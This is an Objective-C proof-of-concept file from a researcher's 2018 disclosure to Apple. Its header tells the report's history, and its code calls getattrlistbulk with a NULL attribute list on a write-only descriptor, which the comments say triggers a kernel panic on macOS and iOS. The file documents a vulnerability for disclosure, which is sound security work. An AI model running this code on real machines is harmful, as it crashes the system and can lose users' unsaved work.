- //
- // getattrlistbulk_dos.m
- // getattrlistbulk_dos
- //
- // Created by FABIANO ANEMONE on 7/31/18.
- // Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
- // Reported to product-security@apple.com on 7/31/18
- // Still not fixed in Mojave 10.14.1 (and iOS 12.1 I guess, I have no device to test it).
- //
- // No CVE assigned ("After further examining your report we do not see any actual security implications.")
- // No bug bounty ("This report did not qualify for an Apple Security Bounty because the issue was not within the program’s current scope.").
- //
- // A few more bugs will be disclosed as they get fixed, or after the 90-day disclosure window (mainly local DoS).
- //
#import <Foundation/Foundation.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/attr.h>
#include <sys/errno.h>
#include <sys/syscall.h>
#include <unistd.h>
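/// Proof of concept from the header above: call getattrlistbulk(2) with a
/// NULL attrlist on a descriptor that was opened write-only (no read access).
/// The original report states this panics the kernel on macOS/iOS; if the
/// call returns instead, its result and errno are printed and the descriptor
/// is closed.
///
/// Always returns 0, as the original did; the exit status does not indicate
/// whether the bug reproduced.
int main(int argc, const char * argv[]) {
    (void)argc;
    (void)argv;

    NSString *documents = [@"~/Documents" stringByExpandingTildeInPath];
    NSString *path = [documents stringByAppendingPathComponent:@"a.txt"];

    // Start from a fresh file on every run. Note that O_CREAT without O_EXCL
    // does not fail on an existing file, so this removal is housekeeping
    // rather than a precondition for open() to succeed.
    [[NSFileManager defaultManager] removeItemAtPath:path error:nil];

    errno = 0;
    // Important: write-only, no READ flag. O_CREAT requires the mode
    // argument; the original omitted it, so the new file's permission bits
    // were whatever happened to be in the vararg slot. 0600 keeps the
    // scratch file owner-only.
    int fd = open([path UTF8String], O_WRONLY | O_CREAT, 0600);
    printf("open: %d - errno: %d\n", fd, errno);
    if (fd == -1) {
        return 0;
    }

    // Kernel panic expected here (both iOS/macOS) per the original report.
    int result = getattrlistbulk(fd, NULL, NULL, 0, 0);
    printf("getattrlistbulk: %d - errno: %d\n", result, errno);

    // Only reached if the kernel survives the call; don't leak the descriptor.
    close(fd);
    return 0;
}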